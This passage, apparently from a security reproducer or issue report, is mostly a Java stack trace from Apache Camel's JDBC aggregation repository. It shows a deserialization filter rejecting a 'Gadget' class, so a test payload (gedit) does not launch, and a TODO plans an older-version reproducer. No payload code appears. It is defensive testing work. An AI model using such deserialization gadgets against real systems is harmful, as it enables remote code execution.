at org.apache.camel.impl.engine.DefaultReactiveExecutor$Worker.executeReactiveWork(DefaultReactiveExecutor.java:189) ~[camel-base-engine-4.4.0-SNAPSHOT.jar:4.4.0-SNAPSHOT]
at org.apache.camel.impl.engine.DefaultReactiveExecutor$Worker.tryExecuteReactiveWork(DefaultReactiveExecutor.java:166) ~[camel-base-engine-4.4.0-SNAPSHOT.jar:4.4.0-SNAPSHOT]
at org.apache.camel.impl.engine.DefaultReactiveExecutor$Worker.schedule(DefaultReactiveExecutor.java:148) ~[camel-base-engine-4.4.0-SNAPSHOT.jar:4.4.0-SNAPSHOT]
at org.apache.camel.impl.engine.DefaultReactiveExecutor.scheduleMain(DefaultReactiveExecutor.java:59) ~[camel-base-engine-4.4.0-SNAPSHOT.jar:4.4.0-SNAPSHOT]
at org.apache.camel.processor.Pipeline.process(Pipeline.java:163) ~[camel-core-processor-4.4.0-SNAPSHOT.jar:4.4.0-SNAPSHOT]
at org.apache.camel.impl.engine.CamelInternalProcessor.processNonTransacted(CamelInternalProcessor.java:354) ~[camel-base-engine-4.4.0-SNAPSHOT.jar:4.4.0-SNAPSHOT]
at org.apache.camel.impl.engine.CamelInternalProcessor.process(CamelInternalProcessor.java:330) ~[camel-base-engine-4.4.0-SNAPSHOT.jar:4.4.0-SNAPSHOT]
at org.apache.camel.component.timer.TimerConsumer.sendTimerExchange(TimerConsumer.java:293) ~[camel-timer-4.4.0-SNAPSHOT.jar:4.4.0-SNAPSHOT]
at org.apache.camel.component.timer.TimerConsumer$1.doRun(TimerConsumer.java:164) ~[camel-timer-4.4.0-SNAPSHOT.jar:4.4.0-SNAPSHOT]
at org.apache.camel.component.timer.TimerConsumer$1.run(TimerConsumer.java:136) ~[camel-timer-4.4.0-SNAPSHOT.jar:4.4.0-SNAPSHOT]
at java.base/java.util.TimerThread.mainLoop(Timer.java:566) ~[na:na]
at java.base/java.util.TimerThread.run(Timer.java:516) ~[na:na]
Caused by: java.io.InvalidClassException: filter status: REJECTED
at java.base/java.io.ObjectInputStream.filterCheck(ObjectInputStream.java:1409) ~[na:na]
at java.base/java.io.ObjectInputStream.readNonProxyDesc(ObjectInputStream.java:2044) ~[na:na]
at java.base/java.io.ObjectInputStream.readClassDesc(ObjectInputStream.java:1898) ~[na:na]
at java.base/java.io.ObjectInputStream.readOrdinaryObject(ObjectInputStream.java:2224) ~[na:na]
at java.base/java.io.ObjectInputStream.readObject0(ObjectInputStream.java:1733) ~[na:na]
at java.base/java.io.ObjectInputStream.readObject(ObjectInputStream.java:509) ~[na:na]
at java.base/java.io.ObjectInputStream.readObject(ObjectInputStream.java:467) ~[na:na]
at java.base/java.util.Hashtable.readHashtable(Hashtable.java:1313) ~[na:na]
at java.base/java.util.Hashtable.readObject(Hashtable.java:1259) ~[na:na]
at java.base/jdk.internal.reflect.NativeMethodAccessorImpl.invoke0(Native Method) ~[na:na]
at java.base/jdk.internal.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:77) ~[na:na]
at java.base/jdk.internal.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43) ~[na:na]
at java.base/java.lang.reflect.Method.invoke(Method.java:568) ~[na:na]
at java.base/java.io.ObjectStreamClass.invokeReadObject(ObjectStreamClass.java:1100) ~[na:na]
at java.base/java.io.ObjectInputStream.readSerialData(ObjectInputStream.java:2423) ~[na:na]
at java.base/java.io.ObjectInputStream.readOrdinaryObject(ObjectInputStream.java:2257) ~[na:na]
at java.base/java.io.ObjectInputStream.readObject0(ObjectInputStream.java:1733) ~[na:na]
at java.base/java.io.ObjectInputStream.readObject(ObjectInputStream.java:509) ~[na:na]
at java.base/java.io.ObjectInputStream.readObject(ObjectInputStream.java:467) ~[na:na]
at org.apache.camel.processor.aggregate.jdbc.JdbcCamelCodec.decode(JdbcCamelCodec.java:104) ~[camel-sql-4.4.0-SNAPSHOT.jar:4.4.0-SNAPSHOT]
at org.apache.camel.processor.aggregate.jdbc.JdbcCamelCodec.unmarshallExchange(JdbcCamelCodec.java:77) ~[camel-sql-4.4.0-SNAPSHOT.jar:4.4.0-SNAPSHOT]
at org.apache.camel.processor.aggregate.jdbc.JdbcCamelCodec.unmarshallExchange(JdbcCamelCodec.java:72) ~[camel-sql-4.4.0-SNAPSHOT.jar:4.4.0-SNAPSHOT]
at org.apache.camel.processor.aggregate.jdbc.JdbcAggregationRepository$4.doInTransaction(JdbcAggregationRepository.java:359) ~[camel-sql-4.4.0-SNAPSHOT.jar:4.4.0-SNAPSHOT]
... 23 common frames omitted
The filter will reject the Gadget class and gedit won't open.
### TODO
Attempt to provide a Camel 2.25.x reproducer.